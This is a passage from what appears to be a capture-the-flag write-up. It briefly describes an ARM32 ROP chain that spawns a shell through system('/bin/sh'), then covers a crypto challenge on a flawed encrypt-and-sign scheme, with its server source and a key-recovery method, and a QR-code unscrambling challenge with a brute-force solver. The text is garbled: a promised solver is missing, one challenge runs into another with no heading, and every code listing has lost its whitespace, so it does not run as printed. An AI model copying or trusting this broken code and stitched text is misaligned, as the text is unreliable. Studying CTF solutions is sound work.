We can use this gadget to fill the r3 with the /bin/sh address, then use the system gadget to spawn the shell. Below is the solver that I used to solve the challenge.
Notice that I incremented the system gadget address by 1, because somehow there is an alignment in ARM32 CPU instruction which sometimes requires us to shift the address of the gadget a little up or down.
Flag: CJ2023{6fb2ad4fe1019c980a3d67b6754733ec}
Crypto
daruma
Description
Software audit is so cringe bro, why don’t we do paper audit instead
nc 178.128.102.145 50001
Initial Analysis
In this challenge, we were given a file called challenge.py which is the source code of the server.
importrandomfromCrypto.Util.numberimport*classAECF:def__init__(self,p=None,q=None,g=2):p=porgetPrime(512)q=qorgetPrime(512)n=p*qself.g=gself.n2=n**2self.totient=n*(p-1)*(q-1)whileTrue:self.k=random.randrange(2,self.n2-1)ifGCD(self.k,self.n2)==1:breakwhileTrue:self.e=random.randrange(2,self.totient-1)ifGCD(self.e,self.totient)==1:breakself.d=inverse(self.e,self.totient)self.l=random.randrange(1,self.n2-1)self.beta=pow(self.g,self.l,self.n2)defpublic_key(self):return(self.n2,self.e,self.beta)defprivate_key(self):return(self.d,self.l)defencrypt_and_sign(self,plaintext,public):n2,e,beta=publicm=bytes_to_long(plaintext)r=pow(self.k,e,n2)%n2s=m*self.k*pow(beta,self.l,n2)%n2returnr,sdefdecrypt_and_verify(self,r,s,beta):m=s*inverse(pow(r,self.d,self.n2),self.n2)* \
inverse(pow(beta,self.l,self.n2),self.n2)%self.n2returnlong_to_bytes(m)FLAG=open('flag.txt','rb').read()bob=AECF()enc_flag=bob.encrypt_and_sign(FLAG,bob.public_key())assertbob.decrypt_and_verify(*enc_flag,bob.beta)==FLAGprint("Encrypted flag:",enc_flag)print("Bob public key:",bob.public_key())for_inrange(2):print()print("="*40)try:n=int(input("Your public modulus: "))ifn.bit_length()<2000orn.bit_length()>10000orisPrime(n):print("Insecure modulus")breake=int(input("Your public e: "))beta=int(input("Your public beta: "))message=input("Message you want to encrypt and sign: ")c=bob.encrypt_and_sign(message.encode(),(n,e,beta))print("Your ciphertext:",c)exceptExceptionase:print(e)break
The author tries to implement the encryption scheme proposed in the attached paper, and tries to show the vulnerability of the scheme. Let’s try to understand the implemented code first.
First, the code initialize the encryption class, which will generate some parameters, where the public key is tuple of $(n^2, e, \beta)$
Second, the code will try to encrypt and sign with the Bob’s public key, where the value of $r$ and $s$ is calculated like below:
$$
r = k^e \mod n^2 \\
s = (m.k.(\beta^l \mod n^2)) \mod n^2
$$
where:
$m$ is the message.
$n^2$ is the squared modulus ($p^2q^2$).
$k$ and $l$ are random integers in the range of $n^2$.
Then, the code will give us the ($r$, $s$, $n^2$, $e$, $\beta$) values.
After that, the code will give us two tries to try encrypt_and_sign, where we can send our own:
public key
message
Based on this information, we need to somehow decrypt the encrypted flag that the code gave us.
Solution
Let’s try to take a closer look in the equation of the encryption:
$$
s = (m.k.(\beta^l \mod n)) \mod n
$$
In order to recover $m$, missing values that we need to recover are $k$ and $l$. So, the target here is given the two tries that the server gave to us, we need to somehow recover those values.
Recovering $k$ is easy. Observe that if we send a huge public modulus, and use $e=1$, the $r$ value that is returned by the server will be equivalent to value $k$.
Now, that we know $k$, with the $s$ that we get from the server during our own trial, we can recover the value of $(\beta^l \mod n)$, because:
$$
(\beta^l \mod n) = s.k^{-1}.m^{-1} \mod n
$$
So now, to recover $l$, this is a classic discrete logarithm problem. Remember that we can select our own $n$ and $\beta$. We can simply use weak $n$, so that the discrete logarithm can be computed in a short time.
After we recover $k$ and $l$, we can easily recover the flag based on the below equation:
$$
m = s.k^{-1}.(\beta^l \mod n)^{-1} \mod n
$$
Below is the solver that I used to solve the challenge (sage file):
To summarize, the code start by creating a QR code that can be decoded to the FLAG. Then, the code convert the QR code into matrix of boolean.
The code generate two random number $a$ and $b$, then it try to mix the matrix 22 times with the $a$ and $b$ values. The mix function itself was trying to scramble the array by doing some linear equations with the index like below:
$$
nx = (x + y * a) \mod \text{len(arr)} \\
ny = (x * b + y * (a * b + 1)) \mod \text{len(arr)}
$$
After that, it will try to rescale the image.
Based on this scheme, the target is to recover the mixed.png and get the correct QRCode image.
Solution
We can see that the value of $a$ and $b$ are very small, which means that it is bruteforce-able. Observe that if we can guess the value of $a$ and $b$, the mix function will become two linear equations with two unknowns ($x$, $y$) under modulo $len(arr)$. We can simply:
unscale the mixed.png
for each mix iteration, try to recover the original value of $x$ and $y$ by solving the linear equations.
Below is the script that I used to solve the challenge (sage). This script will basically generate a lot of images based on the pair of $a$ and $b$ that we brute-forced. We just need to find one image which is the QRCode of the FLAG.
importnumpyasnpfromPILimportImagedefunscale(final_arr):mod=len(final_arr)//10arr=np.zeros(shape=(mod,mod),dtype=bool)foriinrange(mod):forjinrange(mod):arr[i][j]=final_arr[i*10,j*10]returnarr.astype(int).tolist()defunmix(a,b,arr):mod=len(arr)R=IntegerModRing(mod)real_mat=[[0for_inrange(mod)]for_inrange(mod)]foriinrange(mod):forjinrange(mod):M=Matrix(R,[[1,a],[b,(a*b+1)],])target=vector(R,[i,j])x,y=M.solve_right(target)real_mat[x][y]=arr[i][j]returnreal_matdefrescale(arr):mod=len(arr)final_arr=np.zeros(shape=(mod*10,mod*10),dtype=bool)foriinrange(mod):forjinrange(mod):final_arr[i*10:(i+1)*10,j*10:(j+1)*10]=arr[i][j]returnfinal_arrimage=Image.open("mixed.png")image_array=np.array(image)forainrange(1,(len(image_array)//10)-1):forbinrange(1,(len(image_array)//10)-1):scrambled=unscale(image_array)for_inrange(22):scrambled=unmix(a,b,scrambled)ori_arr=np.array(scrambled,dtype=bool)ori_arr=rescale(ori_arr)img=Image.fromarray(ori_arr)img.save(f'result/{a}-{b}-flag.png')print(f'Saved to: result/{a}-{b}-flag.png')
After running the script for a while, parameters $a=10$ and $b=18$ produce the correct QRCode image.